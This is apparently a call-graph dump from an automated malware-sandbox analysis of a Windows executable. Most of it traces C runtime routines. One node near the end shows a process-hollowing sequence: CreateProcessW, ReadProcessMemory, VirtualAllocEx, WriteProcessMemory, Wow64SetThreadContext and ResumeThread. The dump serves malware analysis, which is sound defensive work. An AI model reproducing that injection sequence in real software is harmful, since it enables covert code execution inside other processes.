calls 19852->19853 19859 ed498b 19853->19859 19857 ed49c9 HeapReAlloc 19854->19857 19858 ed49a4 19854->19858 19861 ec4d3c std::ios_base::_Init 2 API calls 19854->19861 19856 ecad27 ___free_lconv_mon 14 API calls 19855->19856 19856->19859 19857->19854 19857->19859 19860 ec6bb1 __strnicoll 14 API calls 19858->19860 19859->19712 19860->19859 19861->19854 19863 ec142a __strnicoll 39 API calls 19862->19863 19864 ecc0b3 19863->19864 19865 ecc0c5 19864->19865 19870 ecb87d 19864->19870 19867 ec1524 19865->19867 19876 ec157c 19867->19876 19873 ecbe92 19870->19873 19874 ecbe0d std::_Locinfo::_Locinfo_dtor 5 API calls 19873->19874 19875 ecb885 19874->19875 19875->19865 19877 ec158a 19876->19877 19878 ec15a4 19876->19878 19894 ec150a 19877->19894 19880 ec15ca 19878->19880 19881 ec15ab 19878->19881 19882 ecadaf __strnicoll MultiByteToWideChar 19880->19882 19893 ec153c 19881->19893 19898 ec14cb 19881->19898 19884 ec15d9 19882->19884 19885 ec15e0 GetLastError 19884->19885 19887 ec1606 19884->19887 19890 ec14cb 15 API calls 19884->19890 19903 ec6bd7 19885->19903 19888 ecadaf __strnicoll MultiByteToWideChar 19887->19888 19887->19893 19891 ec161d 19888->19891 19890->19887 19891->19885 19891->19893 19892 ec6bb1 __strnicoll 14 API calls 19892->19893 19893->19718 19893->19719 19895 ec1515 19894->19895 19896 ec151d 19894->19896 19897 ecad27 ___free_lconv_mon 14 API calls 19895->19897 19896->19893 19897->19896 19899 ec150a 14 API calls 19898->19899 19900 ec14d9 19899->19900 19908 ec14ac 19900->19908 19911 ec6bc4 19903->19911 19905 ec6be2 __dosmaperr 19906 ec6bb1 __strnicoll 14 API calls 19905->19906 19907 ec15ec 19906->19907 19907->19892 19909 ecad61 __strnicoll 15 API calls 19908->19909 19910 ec14b9 19909->19910 19910->19893 19912 ecb104 __dosmaperr 14 API calls 19911->19912 19913 ec6bc9 19912->19913 19913->19905 19966 eb41c0 19914->19966 19916 eb286b 19926 eb287f 19916->19926 19970 eb6e00 19916->19970 19921 eb29bd 19922 ebba3f _ValidateLocalCookies 5 API calls 19921->19922 19923 eb1c45 19922->19923 19927 eb24c0 19923->19927 19924 eb28ad std::ios_base::_Ios_base_dtor 19989 eb6f10 19924->19989 19994 eb45c0 19926->19994 19929 eb24f0 19927->19929 19928 eb41c0 39 API calls 19941 eb25a0 19928->19941 19929->19928 19930 eb45c0 39 API calls 19931 eb2803 19930->19931 19932 eb4610 39 API calls 19931->19932 19933 eb2816 19932->19933 19936 ebba3f _ValidateLocalCookies 5 API calls 19933->19936 19934 eb25b4 19934->19930 19935 eb266d 19942 eb26d2 19935->19942 20967 ebb4c0 19935->20967 19938 eb1c5c 19936->19938 19943 eb22d0 19938->19943 19939 eb4480 70 API calls 19939->19941 19940 eb4480 70 API calls 19940->19942 19941->19934 19941->19935 19941->19939 19942->19934 19942->19940 20978 eb22f0 19943->20978 19967 eb41e0 19966->19967 19969 eb41fd 19967->19969 20002 eb46e0 19967->20002 19969->19916 20012 ebbd52 19970->20012 19974 eb6e3a 19975 eb6e65 19974->19975 20033 eb6ff0 19974->20033 20026 ebbd83 19975->20026 19978 eb6ef0 19979 ebba3f _ValidateLocalCookies 5 API calls 19978->19979 19982 eb6efa 19979->19982 19981 eb6e90 20047 eb49e0 19981->20047 19982->19924 20308 eb7520 19989->20308 19995 eb45e5 19994->19995 20823 eb5920 19995->20823 19998 eb4610 20000 eb4624 19998->20000 19999 eb463f 19999->19921 20000->19999 20963 eb6b10 20000->20963 20003 eb4708 20002->20003 20004 eb4789 20003->20004 20006 eb41c0 39 API calls 20003->20006 20005 ebba3f _ValidateLocalCookies 5 API calls 20004->20005 20007 eb4793 20005->20007 20009 eb4723 20006->20009 20007->19969 20008 eb4610 39 API calls 20008->20004 20010 eb45c0 39 API calls 20009->20010 20011 eb4736 20009->20011 20010->20011 20011->20008 20013 ebbd61 20012->20013 20015 ebbd68 20012->20015 20060 ec75c2 20013->20060 20016 eb6e24 20015->20016 20065 ebe608 EnterCriticalSection 20015->20065 20018 eb47e0 20016->20018 20019 eb483e 20018->20019 20020 eb4802 20018->20020 20022 ebba3f _ValidateLocalCookies 5 API calls 20019->20022 20021 ebbd52 std::_Lockit::_Lockit 7 API calls 20020->20021 20023 eb4813 20021->20023 20024 eb4850 20022->20024 20025 ebbd83 std::_Lockit::~_Lockit 2 API calls 20023->20025 20024->19974 20025->20019 20027 ec75d0 20026->20027 20029 ebbd8d 20026->20029 20115 ec75ab LeaveCriticalSection 20027->20115 20030 ebbda0 20029->20030 20114 ebe616 LeaveCriticalSection 20029->20114 20030->19978 20031 ec75d7 20031->19978 20034 eb706c 20033->20034 20035 eb7010 20033->20035 20036 ebba3f _ValidateLocalCookies 5 API calls 20034->20036 20035->20034 20116 ebb9cb 20035->20116 20037 eb6e82 20036->20037 20037->19981 20043 eb49b0 20037->20043 20039 eb7028 20127 eb4b10 20039->20127 20044 eb49c8 20043->20044 20045 ebf0bd Concurrency::cancel_current_task RaiseException 20044->20045 20046 eb49dd 20045->20046 20048 eb4a10 20047->20048 20049 ebba3f _ValidateLocalCookies 5 API calls 20048->20049 20050 eb4a1d 20049->20050 20051 ebbdf6 20050->20051 20052 ebbe01 ___std_exception_copy 20051->20052 20053 eb6eb2 20052->20053 20304 ebc31d 20052->20304 20056 eb4a30 20053->20056 20057 eb4a5c 20056->20057 20058 ebba3f _ValidateLocalCookies 5 API calls 20057->20058 20059 eb4a69 20058->20059 20059->19975 20066 ecbd0b 20060->20066 20065->20016 20067 ecbe92 std::_Locinfo::_Locinfo_dtor 5 API calls 20066->20067 20068 ecbd10 20067->20068 20087 ecbeac 20068->20087 20086 ecbd3d 20086->20086 20088 ecbe0d std::_Locinfo::_Locinfo_dtor 5 API calls 20087->20088 20089 ecbd15 20088->20089 20090 ecbec6 20089->20090 20091 ecbe0d std::_Locinfo::_Locinfo_dtor 5 API calls 20090->20091 20092 ecbd1a 20091->20092 20093 ecbee0 20092->20093 20094 ecbe0d std::_Locinfo::_Locinfo_dtor 5 API calls 20093->20094 20095 ecbd1f 20094->20095 20096 ecbefa 20095->20096 20097 ecbe0d std::_Locinfo::_Locinfo_dtor 5 API calls 20096->20097 20098 ecbd24 20097->20098 20099 ecbf14 20098->20099 20100 ecbe0d std::_Locinfo::_Locinfo_dtor 5 API calls 20099->20100 20101 ecbd29 20100->20101 20102 ecbf2e 20101->20102 20103 ecbe0d std::_Locinfo::_Locinfo_dtor 5 API calls 20102->20103 20104 ecbd2e 20103->20104 20105 ecbf48 20104->20105 20106 ecbe0d std::_Locinfo::_Locinfo_dtor 5 API calls 20105->20106 20107 ecbd33 20106->20107 20108 ecbf62 20107->20108 20109 ecbe0d std::_Locinfo::_Locinfo_dtor 5 API calls 20108->20109 20110 ecbd38 20109->20110 20111 ecbf7c 20110->20111 20112 ecbe0d std::_Locinfo::_Locinfo_dtor 5 API calls 20111->20112 20113 ecbf92 20112->20113 20113->20086 20114->20030 20115->20031 20118 ebb9d0 ___std_exception_copy 20116->20118 20117 ebb9ea 20117->20039 20118->20117 20119 ec4d3c std::ios_base::_Init 2 API calls 20118->20119 20120 ebb9ec 20118->20120 20119->20118 20121 ebde77 std::ios_base::_Init 20120->20121 20122 ebb9f6 Concurrency::cancel_current_task 20120->20122 20123 ebf0bd Concurrency::cancel_current_task RaiseException 20121->20123 20153 ebf0bd 20122->20153 20124 ebde93 20123->20124 20126 ebc339 20128 ebbd52 std::_Lockit::_Lockit 7 API calls 20127->20128 20129 eb4b30 20128->20129 20130 eb4b9b 20129->20130 20131 eb4b7f 20129->20131 20165 ebc37a 20130->20165 20156 ebbe78 20131->20156 20154 ebf0d7 20153->20154 20155 ebf105 RaiseException 20153->20155 20154->20155 20155->20126 20172 ec87a0 20156->20172 20274 ebc467 20165->20274 20168 ebf0bd Concurrency::cancel_current_task RaiseException 20169 ebc399 20168->20169 20277 eb36c0 20169->20277 20173 ecbd0b std::_Locinfo::_Locinfo_dtor 5 API calls 20172->20173 20174 ec87ad 20173->20174 20181 ec89d2 20174->20181 20182 ec89de ___scrt_is_nonwritable_in_current_image 20181->20182 20189 ec7594 EnterCriticalSection 20182->20189 20184 ec89ec 20190 ec8873 20184->20190 20186 ec89f9 20218 ec8a21 20186->20218 20189->20184 20221 ec87d8 20190->20221 20192 ec888e 20193 ecafb3 __Getctype 39 API calls 20192->20193 20213 ec88d9 20192->20213 20194 ec889b 20193->20194 20268 ed4cbf 20194->20268 20213->20186 20273 ec75ab LeaveCriticalSection 20218->20273 20220 ebbe85 20222 ec87e4 20221->20222 20223 ec87f2 20221->20223 20224 ec4e9b std::_Locinfo::_Locinfo_dtor 60 API calls 20222->20224 20225 ed49df std::_Locinfo::_Locinfo_dtor 41 API calls 20223->20225 20227 ec87ee 20224->20227 20226 ec8809 20225->20226 20228 ec8868 20226->20228 20229 ecc0e0 __Getctype 14 API calls 20226->20229 20227->20192 20230 ec72c9 __Getctype 11 API calls 20228->20230 20231 ec8824 20229->20231 20232 ec8872 20230->20232 20233 ec884c 20231->20233 20235 ed49df std::_Locinfo::_Locinfo_dtor 41 API calls 20231->20235 20237 ec87d8 std::_Locinfo::_Locinfo_dtor 64 API calls 20232->20237 20234 ecad27 ___free_lconv_mon 14 API calls 20233->20234 20236 ec8861 20234->20236 20238 ec883b 20235->20238 20236->20192 20239 ec888e 20237->20239 20240 ec884e 20238->20240 20241 ec8842 20238->20241 20243 ecafb3 __Getctype 39 API calls 20239->20243 20266 ec88d9 20239->20266 20242 ec4e9b std::_Locinfo::_Locinfo_dtor 60 API calls 20240->20242 20241->20228 20241->20233 20242->20233 20244 ec889b 20243->20244 20266->20192 20269 ed4cd3 _Fputc 20268->20269 20270 ed4fa4 std::_Locinfo::_Locinfo_dtor 41 API calls 20269->20270 20271 ed4ceb _Fputc 20270->20271 20273->20220 20281 eb6a70 20274->20281 20278 eb36f7 std::bad_exception::bad_exception 20277->20278 20279 ebf69a ___std_exception_copy 29 API calls 20278->20279 20280 eb370f 20279->20280 20282 eb6ab1 std::bad_exception::bad_exception 20281->20282 20287 ebf69a 20282->20287 20285 ebba3f _ValidateLocalCookies 5 API calls 20286 eb6ada 20285->20286 20286->20168 20288 ebf6a7 ___std_exception_copy 20287->20288 20291 eb6ad0 20287->20291 20290 eca99c ___std_exception_copy 29 API calls 20288->20290 20288->20291 20292 ebf6d4 20288->20292 20289 ec831e std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 14 API calls 20289->20291 20290->20292 20291->20285 20292->20289 20305 ebc32b Concurrency::cancel_current_task 20304->20305 20306 ebf0bd Concurrency::cancel_current_task RaiseException 20305->20306 20307 ebc339 20306->20307 20323 eba120 20308->20323 20310 eb7582 20313 eb7693 20310->20313 20375 ec8339 20310->20375 20329 eba2a0 20313->20329 20314 eb76e1 20324 eba146 std::_Throw_Cpp_error 20323->20324 20386 ebace0 20324->20386 20327 ebba3f _ValidateLocalCookies 5 API calls 20328 eba15b 20327->20328 20328->20310 20330 eba2ba 20329->20330 20331 eba2c9 20330->20331 20332 eba2df 20330->20332 20390 ebad50 20331->20390 20394 ebada0 20332->20394 20335 eba2d7 20335->20314 20376 ec8348 20375->20376 20380 ec835f __floor_pentium4 20375->20380 20377 ec6bb1 __strnicoll 14 API calls 20376->20377 20378 ec834d 20377->20378 20379 ec729c __strnicoll 29 API calls 20378->20379 20381 ec8358 __floor_pentium4 20379->20381 20380->20381 20787 ed3f89 20380->20787 20381->20313 20387 ebad0a std::_Throw_Cpp_error 20386->20387 20388 ebba3f _ValidateLocalCookies 5 API calls 20387->20388 20389 eba151 20388->20389 20389->20327 20391 ebad78 std::_Throw_Cpp_error 20390->20391 20392 ebba3f _ValidateLocalCookies 5 API calls 20391->20392 20393 ebad96 20392->20393 20393->20335 20395 ebae34 20394->20395 20398 ebadd8 std::_Throw_Cpp_error 20394->20398 20400 ebaec0 20395->20400 20397 ebba3f _ValidateLocalCookies 5 API calls 20399 ebae72 20397->20399 20398->20397 20399->20335 20418 eb31c0 20400->20418 20419 eb31db std::_Throw_Cpp_error 20418->20419 20420 ebba3f _ValidateLocalCookies 5 API calls 20419->20420 20421 eb3236 20420->20421 20788 ed3fc2 __floor_pentium4 20787->20788 20789 ed3fe9 __floor_pentium4 20788->20789 20798 ed43ff 20788->20798 20791 ed402c 20789->20791 20792 ed4007 20789->20792 20810 ed408b 20791->20810 20802 ed435f 20792->20802 20795 ed4027 __floor_pentium4 20799 ed442a __raise_exc 20798->20799 20800 ed4623 RaiseException 20799->20800 20801 ed463b 20800->20801 20801->20789 20803 ed436c 20802->20803 20804 ed437b __floor_pentium4 20803->20804 20808 ed43aa __startOneArgErrorHandling __floor_pentium4 20803->20808 20805 ed408b __floor_pentium4 14 API calls 20804->20805 20806 ed4394 20805->20806 20806->20795 20807 ed43f8 20807->20795 20808->20807 20809 ed408b __floor_pentium4 14 API calls 20808->20809 20809->20807 20811 ed40af 20810->20811 20812 ed4098 20810->20812 20813 ec6bb1 __strnicoll 14 API calls 20811->20813 20814 ed40b4 20812->20814 20815 ec6bb1 __strnicoll 14 API calls 20812->20815 20813->20814 20814->20795 20816 ed40a7 20815->20816 20816->20795 20826 eb5970 20823->20826 20827 eb5a5c 20826->20827 20828 eb59b4 20826->20828 20829 ebba3f _ValidateLocalCookies 5 API calls 20827->20829 20831 ebf0bd Concurrency::cancel_current_task RaiseException 20828->20831 20832 eb59d4 20828->20832 20830 eb29b1 20829->20830 20830->19998 20831->20832 20838 eb5a70 20832->20838 20834 eb5a2f 20841 eb5ab0 20834->20841 20846 eb5c50 20838->20846 20840 eb5a87 std::ios_base::_Init 20840->20834 20873 eb6000 20841->20873 20849 eb5c90 20846->20849 20850 eb5c58 20849->20850 20851 eb5cb7 20849->20851 20850->20840 20857 ebba4d AcquireSRWLockExclusive 20851->20857 20853 eb5cc5 20853->20850 20862 ebbb02 20853->20862 20858 ebba61 20857->20858 20859 ebba66 ReleaseSRWLockExclusive 20858->20859 20866 ebbaed SleepConditionVariableSRW 20858->20866 20859->20853 20867 ebbb17 20862->20867 20865 ebba9c AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 20865->20850 20866->20858 20868 ebbb2d 20867->20868 20869 ebbb26 20867->20869 20871 ec6888 std::ios_base::_Init 32 API calls 20868->20871 20870 ec68f9 std::ios_base::_Init 32 API calls 20869->20870 20872 eb5ce0 20870->20872 20871->20872 20872->20865 20882 eb1d50 20873->20882 20883 eb1d79 std::_Throw_Cpp_error 20882->20883 20899 eb2fa0 20883->20899 20886 ebba3f _ValidateLocalCookies 5 API calls 20887 eb1dae 20886->20887 20888 eb60e0 20887->20888 20912 eb6290 20888->20912 20900 eb31c0 std::_Throw_Cpp_error 5 API calls 20899->20900 20901 eb2fcd 20900->20901 20902 eb3240 std::_Throw_Cpp_error 30 API calls 20901->20902 20903 eb2fdf std::_Throw_Cpp_error 20901->20903 20902->20903 20904 eb31c0 std::_Throw_Cpp_error 5 API calls 20903->20904 20909 eb3018 std::_Throw_Cpp_error 20903->20909 20905 eb3072 20904->20905 20906 eb32c0 std::_Throw_Cpp_error 5 API calls 20905->20906 20907 eb3089 20906->20907 20908 eb3360 std::_Throw_Cpp_error 30 API calls 20907->20908 20908->20909 20910 ebba3f _ValidateLocalCookies 5 API calls 20909->20910 20911 eb1da1 20910->20911 20911->20886 20913 eb62b4 std::_Throw_Cpp_error 20912->20913 20936 eb6910 20913->20936 20916 ebba3f _ValidateLocalCookies 5 API calls 20917 eb6129 20916->20917 20918 eb61e0 20917->20918 20937 eb31c0 std::_Throw_Cpp_error 5 API calls 20936->20937 20938 eb693d 20937->20938 20939 eb3240 std::_Throw_Cpp_error 30 API calls 20938->20939 20940 eb694f std::_Throw_Cpp_error 20938->20940 20939->20940 20941 eb31c0 std::_Throw_Cpp_error 5 API calls 20940->20941 20948 eb6988 std::_Throw_Cpp_error 20940->20948 20942 eb69ca 20941->20942 20943 eb32c0 std::_Throw_Cpp_error 5 API calls 20942->20943 20944 eb69e1 20943->20944 20945 eb3360 std::_Throw_Cpp_error 30 API calls 20944->20945 20945->20948 20946 ebba3f _ValidateLocalCookies 5 API calls 20947 eb6302 20946->20947 20947->20916 20948->20946 20964 eb6b2e 20963->20964 20965 eb6b36 20964->20965 20966 eb45c0 39 API calls 20964->20966 20965->19999 20966->20965 20970 ebd1e3 20967->20970 20973 ebcbe8 20970->20973 20974 ebb501 20973->20974 20975 ebcc0e _Yarn 20973->20975 20974->19942 20975->20974 20976 ebce13 70 API calls 20975->20976 20977 ebcdf5 70 API calls 20975->20977 20976->20975 20977->20975 20985 eb6cf0 20978->20985 20986 eb6d14 20985->20986 20987 eb4290 67 API calls 20986->20987 20988 eb6d22 std::ios_base::_Ios_base_dtor 20987->20988 20989 ebba3f _ValidateLocalCookies 5 API calls 20988->20989 20990 eb2318 20989->20990 20991 eb6bf0 20990->20991 20992 eb41c0 39 API calls 20991->20992 20993 eb6c1f 20992->20993 20996 eb4480 70 API calls 20993->20996 21000 eb6c32 20993->21000 20994 eb45c0 39 API calls 20995 eb6cc2 20994->20995 20996->21000 21000->20994 21240 ec4b94 21239->21240 21241 ec4b82 21239->21241 21251 ec4cef 21240->21251 21243 ebe3d9 __CreateFrameInfo GetModuleHandleW 21241->21243 21244 ec4b87 21243->21244 21244->21240 21266 ec4a89 GetModuleHandleExW 21244->21266 21246 ebef49 21246->18919 21252 ec4cfb ___scrt_is_nonwritable_in_current_image 21251->21252 21272 ec7594 EnterCriticalSection 21252->21272 21254 ec4d05 21273 ec4bec 21254->21273 21256 ec4d12 21277 ec4d30 21256->21277 21259 ec4b24 21302 ec4b0b 21259->21302 21261 ec4b2e 21262 ec4b42 21261->21262 21263 ec4b32 GetCurrentProcess TerminateProcess 21261->21263 21264 ec4a89 __CreateFrameInfo 3 API calls 21262->21264 21263->21262 21265 ec4b4a ExitProcess 21264->21265 21267 ec4ac8 GetProcAddress 21266->21267 21268 ec4ae9 21266->21268 21267->21268 21271 ec4adc 21267->21271 21269 ec4aef FreeLibrary 21268->21269 21270 ec4af8 21268->21270 21269->21270 21270->21240 21271->21268 21272->21254 21274 ec4bf8 ___scrt_is_nonwritable_in_current_image __CreateFrameInfo 21273->21274 21276 ec4c5c __CreateFrameInfo 21274->21276 21280 ec68bb 21274->21280 21276->21256 21301 ec75ab LeaveCriticalSection 21277->21301 21279 ec4bcb 21279->21246 21279->21259 21281 ec68c7 __EH_prolog3 21280->21281 21284 ec6b46 21281->21284 21283 ec68ee std::ios_base::_Init 21283->21276 21285 ec6b52 ___scrt_is_nonwritable_in_current_image 21284->21285 21292 ec7594 EnterCriticalSection 21285->21292 21287 ec6b60 21293 ec6a11 21287->21293 21292->21287 21294 ec6a28 21293->21294 21295 ec6a30 21293->21295 21297 ec6b95 21294->21297 21295->21294 21296 ecad27 ___free_lconv_mon 14 API calls 21295->21296 21296->21294 21300 ec75ab LeaveCriticalSection 21297->21300 21299 ec6b7e 21299->21283 21300->21299 21301->21279 21305 ece545 21302->21305 21304 ec4b10 __CreateFrameInfo 21304->21261 21306 ece554 __CreateFrameInfo 21305->21306 21307 ece561 21306->21307 21309 ecbc80 21306->21309 21307->21304 21310 ecbe0d std::_Locinfo::_Locinfo_dtor 5 API calls 21309->21310 21311 ecbc9c 21310->21311 21311->21307 21698 ebd2b9 21699 ebd2db 21698->21699 21703 ebd2f0 21698->21703 21704 ebd431 21699->21704 21707 ebd44c 21704->21707 21709 ebd49d 21704->21709 21705 ebba3f _ValidateLocalCookies 5 API calls 21706 ebd2e0 21705->21706 21706->21703 21710 ec8433 21706->21710 21708 ec846e 69 API calls 21707->21708 21707->21709 21708->21709 21709->21705 21711 ec843e 21710->21711 21712 ec8453 21710->21712 21713 ec6bb1 __strnicoll 14 API calls 21711->21713 21712->21711 21714 ec845a 21712->21714 21715 ec8443 21713->21715 21720 ec6c61 21714->21720 21717 ec729c __strnicoll 29 API calls 21715->21717 21719 ec844e 21717->21719 21718 ec8469 21718->21703 21719->21703 21721 ec6c74 _Fputc 21720->21721 21724 ec6eda 21721->21724 21723 ec6c89 _Fputc 21723->21718 21728 ec6ee6 ___scrt_is_nonwritable_in_current_image 21724->21728 21725 ec6eec 21726 ec7445 __strnicoll 29 API calls 21725->21726 21727 ec6f07 21726->21727 21727->21723 21728->21725 21729 ec6f2f 21728->21729 21735 ec1d4e EnterCriticalSection 21729->21735 21731 ec6f3b 21736 ec6dee 21731->21736 21733 ec6f51 21747 ec6f7a 21733->21747 21735->21731 21737 ec6e14 21736->21737 21738 ec6e01 21736->21738 21750 ec6d15 21737->21750 21738->21733 21740 ec6e37 21741 ec6e52 21740->21741 21746 ec6ec5 21740->21746 21754 ed197a 21740->21754 21743 ec7a7b ___scrt_uninitialize_crt 64 API calls 21741->21743 21744 ec6e65 21743->21744 21768 ed1760 21744->21768 21746->21733 21819 ec1d62 LeaveCriticalSection 21747->21819 21749 ec6f82 21749->21727 21751 ec6d7e 21750->21751 21752 ec6d26 21750->21752 21751->21740 21752->21751 21771 ed1720 21752->21771 21755 ed1d4c 21754->21755 21756 ed1d5b 21755->21756 21757 ed1d83 21755->21757 21758 ec7445 __strnicoll 29 API calls 21756->21758 21759 ece509 _Ungetc 29 API calls 21757->21759 21767 ed1d76 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 21758->21767 21760 ed1d8c 21759->21760 21781 ed177e 21760->21781 21763 ed1e36 21784 ed19d6 21763->21784 21765 ed1e4d 21765->21767 21796 ed1b81 21765->21796 21767->21741 21769 ed18c1 _Fputc 31 API calls 21768->21769 21770 ed1779 21769->21770 21770->21746 21772 ed1734 _Fputc 21771->21772 21775 ed18c1 21772->21775 21774 ed1749 _Fputc 21774->21751 21776 ed23dd _Fputc 29 API calls 21775->21776 21777 ed18d3 21776->21777 21778 ed18ef SetFilePointerEx 21777->21778 21780 ed18db _Fputc 21777->21780 21779 ed1907 GetLastError 21778->21779 21778->21780 21779->21780 21780->21774 21803 ed179c 21781->21803 21785 ed19e5 _Fputc 21784->21785 21786 ece509 _Ungetc 29 API calls 21785->21786 21788 ed1a01 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 21786->21788 21787 ebba3f _ValidateLocalCookies 5 API calls 21789 ed1b7f 21787->21789 21790 ed177e 33 API calls 21788->21790 21795 ed1a0d 21788->21795 21789->21767 21791 ed1a61 21790->21791 21792 ed1a93 ReadFile 21791->21792 21791->21795 21793 ed1aba 21792->21793 21792->21795 21794 ed177e 33 API calls 21793->21794 21794->21795 21795->21787 21797 ece509 _Ungetc 29 API calls 21796->21797 21798 ed1b94 21797->21798 21799 ed1bde __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 21798->21799 21800 ed177e 33 API calls 21798->21800 21799->21767 21801 ed1c3b 21800->21801 21801->21799 21802 ed177e 33 API calls 21801->21802 21802->21799 21806 ed17a8 ___scrt_is_nonwritable_in_current_image 21803->21806 21804 ed1797 21804->21763 21804->21765 21804->21767 21805 ed17eb 21807 ec7445 __strnicoll 29 API calls 21805->21807 21806->21804 21806->21805 21808 ed1831 21806->21808 21807->21804 21814 ed2626 EnterCriticalSection 21808->21814 21810 ed1837 21811 ed1858 21810->21811 21812 ed18c1 _Fputc 31 API calls 21810->21812 21815 ed18b9 21811->21815 21812->21811 21814->21810 21818 ed2649 LeaveCriticalSection 21815->21818 21817 ed18bf 21817->21804 21818->21817 21819->21749 18829 ee619e 18833 ee61d4 18829->18833 18830 ee6321 GetPEB 18831 ee6333 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 18830->18831 18832 ee63da WriteProcessMemory 18831->18832 18831->18833 18834 ee641f 18832->18834 18833->18830 18833->18831 18835 ee6424 WriteProcessMemory 18834->18835 18836 ee6461 WriteProcessMemory Wow64SetThreadContext ResumeThread 18834->18836 18835->18834 23615 ebd39a 23616 ebd3d8 23615->23616 23617 ebd3a3 23615->23617 23617->23616 23620 ec79ba 23617->23620 23619 ebd3cb 23621 ec79cc 23620->23621 23623 ec79d5 ___scrt_uninitialize_crt 23620->23623 23622 ec7b38 ___scrt_uninitialize_crt 68 API calls 23621->23622 23624 ec79d2 23622->23624 23625 ec79e4 23623->23625 23628 ec7cbd 23623->23628 23624->23619 23625->23619 23629 ec7cc9 ___scrt_is_nonwritable_in_current_image 23628->23629 23636 ec1d4e EnterCriticalSection 23629->23636 23631 ec7cd7 23632 ec7a16 ___scrt_uninitialize_crt 68 API calls 23631->23632 23633 ec7ce8 23632->23633 23637 ec7d11 23633->23637 23636->23631 23640 ec1d62 LeaveCriticalSection 23637->23640 23639 ec7a0b 23639->23619 23640->23639 23707 ebd349 23708 ebd358 23707->23708 23710 ebd37c 23708->23710 23711 ec8a2d 23708->23711 23712 ec8a40 _Fputc 23711->23712 23715 ec8a9a 23712->23715 23714 ec8a55 _Fputc 23714->23710 23716 ec8aac 23715->23716 23717 ec8acf 23715->23717 23718 ec7445 __strnicoll 29 API calls 23716->23718 23717->23716 23720 ec8af6 23717->23720 23719 ec8ac7 23718->23719 23719->23714 23723 ec8bd0 23720->23723 23724 ec8bdc ___scrt_is_nonwritable_in_current_image 23723->23724 23731 ec1d4e EnterCriticalSection 23724->23731 23726 ec8bea 23732 ec8b30 23726->23732 23728 ec8bf7 23741 ec8c1f 23728->23741 23731->23726 23733 ec7a7b ___scrt_uninitialize_crt 64 API calls 23732->23733 23734 ec8b4b 23733->23734 23735 ecd662 14 API calls 23734->23735 23736 ec8b55 23735->23736 23737 ecc0e0 __Getctype 14 API calls 23736->23737 23739 ec8b70 23736->23739 23738 ec8b94 23737->23738 23740 ecad27 ___free_lconv_mon 14 API calls 23738->23740 23739->23728 23740->23739 23744 ec1d62 LeaveCriticalSection 23741->23744 23743 ec8b2e 23743->23714 23744->23743 23776 ebcf43 23777 ebcf5e 23776->23777 23779 ebcf70 23777->23779 23780 ebc9a4 23777->23780 23783 ec93de 23780->23783 23784 ec93ea ___scrt_is_nonwritable_in_current_image 23783->23784 23785 ec9408 23784->23785 23786 ec93f1 23784->23786 23796 ec1d4e EnterCriticalSection 23785->23796 23788 ec6bb1 __strnicoll 14 API calls 23786->23788 23790 ec93f6 23788->23790 23789 ec9417 23797 ec945c 23789->23797 23791 ec729c __strnicoll 29 API calls 23790->23791 23793 ebc9b6 23791->23793 23793->23779 23794 ec9425 23811 ec9454 23794->23811 23796->23789 23798 ec9472 23797->23798 23801 ec94fc _Ungetc 23797->23801 23799 ec94a0 23798->23799 23800 ed512f _Ungetc 14 API calls 23798->23800 23798->23801 23799->23801 23802 ece509 _Ungetc 29 API calls 23799->23802 23800->23799 23801->23794 23803 ec94b2 23802->23803 23804 ece509 _Ungetc 29 API calls 23803->23804 23805 ec94d5 23803->23805 23806 ec94be 23804->23806 23805->23801 23814 ec9512 23805->23814 23806->23805 23808 ece509 _Ungetc 29 API calls 23806->23808 23809 ec94ca 23808->23809 23810 ece509 _Ungetc 29 API calls 23809->23810 23810->23805 23841 ec1d62 LeaveCriticalSection 23811->23841 23813 ec945a 23813->23793 23815 ece509 _Ungetc 29 API calls 23814->23815 23816 ec9535 23815->23816 23817 ece509 _Ungetc 29 API calls 23816->23817 23824 ec955e 23816->23824 23819 ec9543 23817->23819 23818 ec9598 23825 ebba3f _ValidateLocalCookies 5 API calls 23818->23825 23821 ece509 _Ungetc 29 API calls 23819->23821 23819->23824 23822 ec9551 23821->23822 23823 ece509 _Ungetc 29 API calls 23822->23823 23823->23824 23824->23818 23827 ece1fb 23824->23827 23826 ec9616 23825->23826 23826->23801 23828 ece20e _Fputc 23827->23828 23831 ece235 23828->23831 23830 ece223 _Fputc 23830->23818 23832 ece24a 23831->23832 23833 ece28b 23832->23833 23834 ec21e0 _Fputc 39 API calls 23832->23834 23835 ece24e _Fputc std::bad_exception::bad_exception 23832->23835 23840 ece277 std::bad_exception::bad_exception 23832->23840 23833->23835 23837 ecae71 _Fputc WideCharToMultiByte 23833->23837 23833->23840 23834->23833 23835->23830 23836 ec7445 __strnicoll 29 API calls 23836->23835 23838 ece346 23837->23838 23838->23835 23839 ece35c GetLastError 23838->23839 23839->23835 23839->23840 23840->23835 23840->23836 23841->23813 22461 ecb258 22462 ecb273 22461->22462 22463 ecb263 22461->22463 22467 ecb35d 22463->22467 22466 ecad27 ___free_lconv_mon 14 API calls 22466->22462 22468 ecb372 22467->22468 22471 ecb378 22467->22471 22469 ecad27 ___free_lconv_mon 14 API calls 22468->22469 22469->22471 22470 ecad27 ___free_lconv_mon 14 API calls 22472 ecb384 22470->22472 22471->22470 22473 ecad27 ___free_lconv_mon 14 API calls 22472->22473 22474 ecb38f 22473->22474 22475 ecad27 ___free_lconv_mon 14 API calls 22474->22475 22476 ecb39a 22475->22476 22477 ecad27 ___free_lconv_mon 14 API calls 22476->22477 22478 ecb3a5 22477->22478 22479 ecad27 ___free_lconv_mon 14 API calls 22478->22479 22480 ecb3b0 22479->22480 22481 ecad27 ___free_lconv_mon 14 API calls 22480->22481 22482 ecb3bb 22481->22482 22483 ecad27 ___free_lconv_mon 14 API calls 22482->22483 22484 ecb3c6 22483->22484 22485 ecad27 ___free_lconv_mon 14 API calls 22484->22485 22486 ecb3d1 22485->22486 22487 ecad27 ___free_lconv_mon 14 API calls 22486->22487 22488 ecb3df 22487->22488 22493 ecb4d6 22488->22493 22494 ecb4e2 ___scrt_is_nonwritable_in_current_image 22493->22494 22509 ec7594 EnterCriticalSection 22494->22509 22496 ecb516 22510 ecb535 22496->22510 22497 ecb4ec 22497->22496 22500 ecad27 ___free_lconv_mon 14 API calls 22497->22500 22500->22496 22501 ecb541 22502 ecb54d 